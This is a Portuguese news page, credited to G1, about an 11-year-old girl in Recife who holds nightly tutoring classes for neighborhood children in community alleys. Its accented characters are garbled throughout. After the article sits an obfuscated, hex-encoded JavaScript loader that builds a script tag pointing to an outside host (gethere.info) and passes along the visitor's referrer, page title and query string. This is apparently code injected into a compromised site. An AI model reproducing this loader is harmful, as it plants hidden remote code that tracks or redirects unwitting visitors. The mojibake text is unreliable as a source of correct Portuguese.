Nova pagina 1

Garota de 11 anos transforma becos de comunidade no Recife em sala de aula para crianA�as

Sonho de Stheffany Rafaela, que mora em Roda de Fogo, na Zona Oeste da cidade, A� cursar faculdade para trabalhar como professora de matemA?tica.

Garota de 11 anos transforma becos de comunidade no Recife em sala de aula para crianA�as

Garota de 11 anos dA? aula em becos de comunidade no Recife (Foto: Aldo Carneiro/Pernambuco Press)

Garota de 11 anos dA? aula em becos de comunidade no Recife.

Em meio aos incontA?veis becos que dA?o acesso A�s vielas da comunidade de Roda de Fogo, na Zona Oeste do Recife, uma cena se destaca a cada noite. No chA?o de cimento batido, Stheffany Rafaela da Silva, de 11 anos, voluntariamente dA? aulas de reforA�o escolar a outras crianA�as. A�s vezes sem mais que um lA?pis na mA?o e um olhar atento, 15 meninos e meninas se reA?nem diariamente para aprender com a garota.

As aulas comeA�aram no ano passado como uma brincadeira, quando uma amiga da comunidade decidiu brincar de a�?escolinhaa�?, dando a Stheffany a primeira experiA?ncia como professora. Pouco tempo depois, a amiga mudou-se da comunidade e, assim, coube a Stheffany o papel de transformar os becos e os quase inexistentes recursos em sala de aula.

a�?Dou aula de todas as matA�rias, todos os dias. NA?o escolho apenas um assunto para dar aula. Fazemos sempre todas as que temos nos livros, no tempo que dA?. E todo mundo vem, raramente alguA�m falta. Exceto na sexta-feiraa�?, conta.

Aos 11 anos, Stheffany quer ser professora de matemA?tica (Foto: Aldo Carneiro/Pernambuco Press)

Aos 11 anos, Stheffany quer ser professora de matemA?tica.

Apesar de nA?o escolher um A?nico tema para lecionar, Stheffany elegeu a matemA?tica como sua disciplina favorita, seja para estudar ou passar para as crianA�as a quem dA? aula. Apesar da pouca idade, ela jA? tem a certeza da profissA?o que quer desempenhar no futuro.

a�?Quero fazer faculdade para ser professora, primeiro, para dar aula de tudo. Depois, sA? de matemA?tica, porque A� o que eu mais gostoa�?, afirma Stheffany.

A maioria dos estudantes de Stheffany tem menos de dez anos, mas a idade nA?o A� barreira para a desenvoltura da pequena professora. A garota chega a ter, inclusive, alunos mais velhos que ela, a exemplo de um de 12 anos, por exemplo.

Stheffany A� estudante do 6A? ano em uma escola particular do Recife (Foto: Aldo Carneiro/Pernambuco Press)

Stheffany A� estudante do 6A? ano em uma escola particular do Recife.

No colA�gio onde estudava, a Escola Pintor Lauro Villares, a garota jA? era conhecida por das aulas nos becos da Roda de Fogo. Por causa disso, Stheffany ganhou uma bolsa em uma escola particular da regiA?o, onde comeA�ou a estudar no fim de abril deste ano, custeada por uma pessoa que se sensibilizou com a histA?ria da pequena professora.

Para incentivar as crianA�as a irem A�s aulas, sem muitos recursos, Stheffany pede na comunidade doces e materiais para cozinhar, com a mA?e, guloseimas e oferecer aos estudantes. Sustentando a casa com o dinheiro do Bolsa FamA�lia, a mA?e de Stheffany, Rafaela da Silva, de 29 anos, vA? na filha a realizaA�A?o de seus sonhos. Segundo ela, desde muito nova, a garota demonstra gosto por estudar.

a�?Ela nunca deu trabalho com relaA�A?o aos estudos, sempre foi uma menina muito calma, exceto, claro, pelos momentos de estresse, como toda crianA�a tem. Todos os dias, A� noite, ela dizia que ia brincar de escolinha. Eu sempre me preocupava para que ela nA?o ficasse na casa dos outros, perturbandoa�?, diz Rafaela.

Stheffany ganhou bolsa de estudos em uma escola particular (Foto: Aldo Carneiro/Pernambuco Press)

Stheffany ganhou bolsa de estudos em uma escola particular.

Durante a semana, sA?o raros os momentos em que o lazer de Stheffany nA?o tem a ver com estudo. ApA?s voltar da escola, ela passa as tardes no Centro ComunitA?rio da Paz (Compaz) Escritor Ariano Suassuna, no bairro do Cordeiro, na Zona Oeste do Recife. No local, ela participa de aulas de danA�a, nataA�A?o e da oficina de artesanatoa�?FaA�a vocA? mesmoa�?.

a�?Nos dias de hoje, estA? tA?o difA�cil fazer as crianA�as quererem estudar. Tenho muito orgulho dela. Eu saA� da escola no 9A? ano do ensino fundamental e sempre digo a ela que continue com essa sede por estudo. Quero que ela siga em frente e alcance todos os sonhos que tivera�?, ressalta a mA?e, orgulhosa.

Fonte G1

var _0xd052=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

Faça o primeiro comentário a "Garota de 11 anos transforma becos de comunidade no Recife em sala de aula para crianA�as"

Comentar

O seu endereço de email não será publicado.


*